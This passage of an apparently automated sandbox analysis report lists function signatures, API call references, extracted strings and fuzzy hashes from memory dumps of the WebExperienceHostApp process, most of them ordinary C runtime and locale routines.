                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Find_elem
                                                                    • String ID: 0123456789-
                                                                    • API String ID: 2867937686-3850129594
                                                                    • Opcode ID: b14931fd472b40645d27b5a95acc8c6e665534d485ad77f27e7d9b469a2a64a5
                                                                    • Instruction ID: 2c13c59293c3b6e51189fab5782682c8a359b65b66c5957bed7335b5b5bcccab
                                                                    • Opcode Fuzzy Hash: b14931fd472b40645d27b5a95acc8c6e665534d485ad77f27e7d9b469a2a64a5
                                                                    • Instruction Fuzzy Hash: A5E29126A19A96CAEB508F29D45027D3B64FB85B94F549032EF4E077BACF3CD895C700
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002B8040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFE00283832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFE002B804F
                                                                      • Part of subcall function 00007FFE002D2B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285AA8), ref: 00007FFE002D2B36
                                                                      • Part of subcall function 00007FFE002A44F8: localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFE0029AA1C), ref: 00007FFE002A4539
                                                                      • Part of subcall function 00007FFE002A44F8: _Getvals.LIBCPMT ref: 00007FFE002A4575
                                                                    • _W_Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FF08), ref: 00007FFE002A6A1B
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FF08), ref: 00007FFE002A6A30
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FF08), ref: 00007FFE002A6A47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$GettnamesGetvals_lock_localeslocaleconvmalloc
                                                                    • String ID: O($`S($`S(
                                                                    • API String ID: 4046447902-4110821724
                                                                    • Opcode ID: bedf28c8c434659652b56425a752b8efcb6f46d13c27a4a9a6688eff6c901d28
                                                                    • Instruction ID: 9d55c7bba794c42713870e153349a1e187dab91c8f6f8e196a7ee9bd78795e66
                                                                    • Opcode Fuzzy Hash: bedf28c8c434659652b56425a752b8efcb6f46d13c27a4a9a6688eff6c901d28
                                                                    • Instruction Fuzzy Hash: 03825A21E4AA0386EB529B60D8652B92BA8BF857C4F484435EB4E477BEDF3CE555C300
                                                                    APIs
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002B5A39
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002B5AB3
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002B5B31
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002B5FDB
                                                                      • Part of subcall function 00007FFE00291DB0: memcpy.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFE0028C21C), ref: 00007FFE00291E0B
                                                                      • Part of subcall function 00007FFE00291DB0: memset.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFE0028C21C), ref: 00007FFE00291E18
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002B6027
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002B606D
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002B60EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 2613654500-0
                                                                    • Opcode ID: b01032cb335723ba4be964af104a56bb7b3906e80541883ba96dbf4a7885703b
                                                                    • Instruction ID: 1a63c996184e927de43ac3cf4cb0923d3a12628d359ddee015ef6dd8255e0ee9
                                                                    • Opcode Fuzzy Hash: b01032cb335723ba4be964af104a56bb7b3906e80541883ba96dbf4a7885703b
                                                                    • Instruction Fuzzy Hash: 2052B322B08B9785FB118B65D4442AD6BA6FB94B98F444231DF9D17BAEDF3CE481C340
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002B28E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002B29E2
                                                                      • Part of subcall function 00007FFE002B8040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFE00283832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFE002B804F
                                                                    • _Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FEF7,?,?,?,?,?,?,?,00007FFE0028F897), ref: 00007FFE002B572D
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FEF7,?,?,?,?,?,?,?,00007FFE0028F897), ref: 00007FFE002B5742
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FEF7,?,?,?,?,?,?,?,00007FFE0028F897), ref: 00007FFE002B5750
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$Gettnames_invalid_parameter_noinfo_noreturn_lock_locales
                                                                    • String ID: (+$ (+$ (+
                                                                    • API String ID: 962949324-3097920636
                                                                    • Opcode ID: ca63c23946b59551808c2ed41c9c37c66fdc98cf6e1290c6b37f3c5997b2e07b
                                                                    • Instruction ID: e512976aa345bfa6a4f7bbbdde5d19197e17f28e62b445c0c4a703456be93abd
                                                                    • Opcode Fuzzy Hash: ca63c23946b59551808c2ed41c9c37c66fdc98cf6e1290c6b37f3c5997b2e07b
                                                                    • Instruction Fuzzy Hash: B7323B31E0AA1385FA969B61D8512B92BA8BF88780F484435EB4E577BFDF3CE555C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit$localeconv
                                                                    • String ID: 0$0$0123456789abcdefABCDEF
                                                                    • API String ID: 2634821343-613610638
                                                                    • Opcode ID: 49174df5c4cdc396e0c5235f3f105a11f693802dc7eaefa8f2b40817c63aabed
                                                                    • Instruction ID: 6c9f9d17a29d218ce0f698fc51162287a97233e25f0a26e9847846c3aec8ad7b
                                                                    • Opcode Fuzzy Hash: 49174df5c4cdc396e0c5235f3f105a11f693802dc7eaefa8f2b40817c63aabed
                                                                    • Instruction Fuzzy Hash: 9C812772E0856747EB258F24D81167A7AA5FB84B44F188031DF8E477EAEB3CE845C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Findmemcpy$CloseFileFirst_invalid_parameter_noinfo_noreturnwcscpy_s
                                                                    • String ID: .$.
                                                                    • API String ID: 2624417167-3769392785
                                                                    • Opcode ID: b54155074bf5bdd9a68a963a018a7fba49ecd6018a5380948614d025b80af060
                                                                    • Instruction ID: b58b10a53cee55fe30376545fe7afcfc2af02f2e6a19bb64540281fb80e93244
                                                                    • Opcode Fuzzy Hash: b54155074bf5bdd9a68a963a018a7fba49ecd6018a5380948614d025b80af060
                                                                    • Instruction Fuzzy Hash: F241B326A1968285FA20DFA5E8442B967A0FBC57A4F444232EF9D037EDDF7CD584C701
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$localeconv
                                                                    • String ID: $$0123456789ABCDEFabcdef-+XxPp
                                                                    • API String ID: 1825414929-3344005635
                                                                    • Opcode ID: 86556c306f232d31921ec4d15b433fc9dda67ad9f9b6300d480a215ede20281a
                                                                    • Instruction ID: 93d4dbe27bc4e6db8277dde3033ad5468b9aae50df0d2632362f89db25cac210
                                                                    • Opcode Fuzzy Hash: 86556c306f232d31921ec4d15b433fc9dda67ad9f9b6300d480a215ede20281a
                                                                    • Instruction Fuzzy Hash: D0D24936A09A8785EF548F19D15017C3BA1FB90B84B959832DF4E077AADF3DE8A1D310
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$localeconv
                                                                    • String ID: $$0123456789ABCDEFabcdef-+XxPp
                                                                    • API String ID: 1825414929-3344005635
                                                                    • Opcode ID: aaa7e4684dea0de9e9086490142b97dde05b5b67a6d3a14f4f169e42f5d3e4e7
                                                                    • Instruction ID: 9cb05342d97193c47bd1ee442108e7d5b89c3162c1ded18852708897c21adb83
                                                                    • Opcode Fuzzy Hash: aaa7e4684dea0de9e9086490142b97dde05b5b67a6d3a14f4f169e42f5d3e4e7
                                                                    • Instruction Fuzzy Hash: 15D24C36A09A8785EB908F19D15017C3BA1FB94B84B959832DF5E477BACF3DE891C310
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0123456789-+Ee
                                                                    • API String ID: 0-1347306980
                                                                    • Opcode ID: a10a18ac66ba2a4b9f7cde72f4e60308c5d3c6f7e0bdff66e84d04cfa45a5f4d
                                                                    • Instruction ID: 8c7059d29e9b64937c2335f16195eaf062a6673189cd50d2b117b0e4b2cbf249
                                                                    • Opcode Fuzzy Hash: a10a18ac66ba2a4b9f7cde72f4e60308c5d3c6f7e0bdff66e84d04cfa45a5f4d
                                                                    • Instruction Fuzzy Hash: DEC25B26A09A8785EB558F19E15017D3BA1FB94F84B949832DF4E077BACF3DE891C310
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0123456789-+Ee
                                                                    • API String ID: 0-1347306980
                                                                    • Opcode ID: 975c390083cc323f49d0a25d7e2a16abc720d2ccfd826877c86762ac604253f7
                                                                    • Instruction ID: dba805ff7b3d69483b962e8073b486f9e292a0124cccbf8bae732dddd8380da4
                                                                    • Opcode Fuzzy Hash: 975c390083cc323f49d0a25d7e2a16abc720d2ccfd826877c86762ac604253f7
                                                                    • Instruction Fuzzy Hash: DDC24D26A09A8785EB548F19D15017D3BA1FB94F84BA49832DF4E077BACF3DE891D310
                                                                    APIs
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A7987
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A7A19
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A7ABC
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A7F78
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A7FCA
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A8011
                                                                      • Part of subcall function 00007FFE002AF6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFE00299A2E), ref: 00007FFE002AF728
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                    • String ID:
                                                                    • API String ID: 3063020102-0
                                                                    • Opcode ID: eebc192cbd0a987a80d3a00d6f6e2cac622f7362e9ae47966162b1b65651f233
                                                                    • Instruction ID: 19c248a4c470a1efc42f0ea81a5b3a8508982d06144a849f1ff4b009f5c3bb9c
                                                                    • Opcode Fuzzy Hash: eebc192cbd0a987a80d3a00d6f6e2cac622f7362e9ae47966162b1b65651f233
                                                                    • Instruction Fuzzy Hash: 29528162A1CB8686EB10CF29D8441BD7B61FB95B98F405532EB8D03BAADF7CD584C344
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2354928869-0
                                                                    • Opcode ID: 243aefc0258b0b269433c76fd2b4b90c39a714807ae03ccb53dd7d940baafd4e
                                                                    • Instruction ID: 5ce2da3d9f56f1518154a57b4debefc17379d12698506bc55d1e2da479a80d6b
                                                                    • Opcode Fuzzy Hash: 243aefc0258b0b269433c76fd2b4b90c39a714807ae03ccb53dd7d940baafd4e
                                                                    • Instruction Fuzzy Hash: 3EE16E22B09B5685EB10DFA9D4401AC77B1FB88B98B504536DF9D17BA9DF3CD48AC340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2354928869-0
                                                                    • Opcode ID: 9a6a9a5831d60da9de16aa5e4a4b682bd4daa7348588c6784df99043229ce472
                                                                    • Instruction ID: d3da4a7c963d40ca5e07118f1ed2e5271666d6ec803fe3075240833df8b88fdc
                                                                    • Opcode Fuzzy Hash: 9a6a9a5831d60da9de16aa5e4a4b682bd4daa7348588c6784df99043229ce472
                                                                    • Instruction Fuzzy Hash: 34E16F22B09B5685FB10DBA9D4401AC77B1FB88B98B50453ADF9D17BA9DF3CD48AC300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$memchr
                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                    • API String ID: 2740501399-2799312399
                                                                    • Opcode ID: b41d6cc7be76b3909485a6c58d98804c70bedfa68c8fcabdfaa25af99012b850
                                                                    • Instruction ID: c62b23a8c5e55d95bd3bf42df0cc7f8b2cefcad03d81c0e92f74b780bc2d5a78
                                                                    • Opcode Fuzzy Hash: b41d6cc7be76b3909485a6c58d98804c70bedfa68c8fcabdfaa25af99012b850
                                                                    • Instruction Fuzzy Hash: 1A52902AA0AA8389EF55CFA9C15017C3F61BB91B98B559031DF5E077AACF3DE456C300
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _lock_locales
                                                                    • String ID: P($`S($`S($`S(
                                                                    • API String ID: 3756862740-4279004866
                                                                    • Opcode ID: 9c6f57f6fe4f8df524f15fd5fdb067607200c0e3db0c4d161015478e316bba9a
                                                                    • Instruction ID: 099b351df5594d0bf441ac2ec1da6498e314d71779cb57d67b0e3424af8bac77
                                                                    • Opcode Fuzzy Hash: 9c6f57f6fe4f8df524f15fd5fdb067607200c0e3db0c4d161015478e316bba9a
                                                                    • Instruction Fuzzy Hash: F0E14F25E0AA0385FA96DB95D9602B62BA8BF987C4F484535DB0D437BFDF3CA641C700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                    • String ID:
                                                                    • API String ID: 4268342597-0
                                                                    • Opcode ID: b37a80acf4bc01ee0b7c53ce3a5b8644b15933e38540d10309bab3a19def6f90
                                                                    • Instruction ID: 50e0369942aec34e8f7072ec4c50935b2d952bb173f524dffe04deadafcaac28
                                                                    • Opcode Fuzzy Hash: b37a80acf4bc01ee0b7c53ce3a5b8644b15933e38540d10309bab3a19def6f90
                                                                    • Instruction Fuzzy Hash: 88913225A89B8286E75A9F2594443B9A794BF4DB44F24C235D94EC77E4EFBCE440CB00
                                                                    APIs
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A4DBD
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002A4E0B
                                                                      • Part of subcall function 00007FFE002AF6C4: memcpy.VCRUNTIME140_APP(?,?,?,?,?,00007FFE00299A2E), ref: 00007FFE002AF728
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                    • String ID:
                                                                    • API String ID: 3063020102-0
                                                                    • Opcode ID: 9ca4dc071eb19751b6358c9b2cf898d5059c564fb8bdd1c327911aa1a6c5f0b9
                                                                    • Instruction ID: 06fdaafccf7d0123f1728b3b0d3f7793a0176fd95e955ec78da7292dc13ba944
                                                                    • Opcode Fuzzy Hash: 9ca4dc071eb19751b6358c9b2cf898d5059c564fb8bdd1c327911aa1a6c5f0b9
                                                                    • Instruction Fuzzy Hash: FBD18E22B09B568AFB00DFA5D4402AC7772EB89B98F444532DF4D17BAADF78E549C340
                                                                    APIs
